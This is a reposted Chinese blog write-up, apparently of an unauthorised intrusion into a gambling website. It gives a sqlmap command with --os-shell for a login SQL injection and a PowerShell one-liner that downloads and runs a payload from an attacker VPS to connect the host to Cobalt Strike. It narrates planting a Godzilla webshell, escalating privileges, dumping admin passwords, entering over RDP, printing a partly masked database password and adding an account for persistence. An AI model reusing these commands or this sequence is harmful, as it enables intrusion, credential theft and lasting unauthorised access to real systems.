标签：实战 QP 渗透 哥斯拉 棋牌 -- cs sqlmap powershell

记一次QP渗透测试实战

该站点为棋牌站点，都被大佬们玩烂了：

登录处存在sql注入，可以直接获取shell，抓包获取请求包：

上sqlmap，个人习惯sqlmap语句：python2 .\sqlmap.py -r .\1.txt --batch --random-agent --fresh-queries --dbms mssql --os-shell

执行powershell命令，直接上线cs：powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://vpsip/payload.ps1'))"

查看cs，已经成功上线：

不存在域：

翻一下目录，看能不能传一个哥斯拉，直接提权的那种，不过话说棋牌还谈业绩？？？

这个站上好几个棋牌目录：

日了狗的，找路径找了半天，后面根据时间找到了，上传哥斯拉：

上传成功，哥斯拉连接成功：

提权成功：

利用powershell，直接cs 上线system权限：

抓取管理员密码，芜湖，起飞~~：

看下开放3389端口没~~，开放了呀，尝试登陆：

代理都不用了，直接连上：

查看配置文件，账号：sa，密码Qq166xxxx0373：

查找了一下qq，没找到，好像是一个手机号：

不管了，有个DATA.rar文件150多M，下载不下来，，，连接数据库康康，代理都不用，又直接连上了：

看了几眼，懒得看，，，

后续？哪来的后续，，加个账户走人：

标签：实战,QP,渗透,哥斯拉,棋牌,--,cs,sqlmap,powershell
来源： https://blog.csdn.net/qq_42967398/article/details/112346218

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。